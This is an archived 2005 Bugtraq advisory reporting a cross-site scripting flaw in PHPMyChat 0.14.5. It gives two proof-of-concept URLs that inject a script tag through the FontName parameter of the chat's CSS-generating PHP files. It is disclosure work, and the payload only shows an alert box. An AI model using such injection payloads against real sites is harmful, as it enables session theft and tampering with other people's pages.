Bugtraq mailing list archives
PHPHeaven PHPMyChat Cross-site Scripting Vulnerablitiy
From: Megasky <magasky () hotmail com>
Date: 14 May 2005 04:21:07 -0000
www.phpheaven.net/ Vulnerable versions: PHPMyChat 0.14.5 Proof of concept: http://www.example.com/chat/config/start-page.css.php3?Charset=iso-8859-1&medium=10&FontName=<script>var%20test=1;alert(test);</script> http://www.example.com/chat/config/style.css.php3?Charset=iso-8859-1&medium=10&FontName=<script>var%20test=1;alert(test);</script>
Current thread:
- PHPHeaven PHPMyChat Cross-site Scripting Vulnerablitiy Megasky (May 13)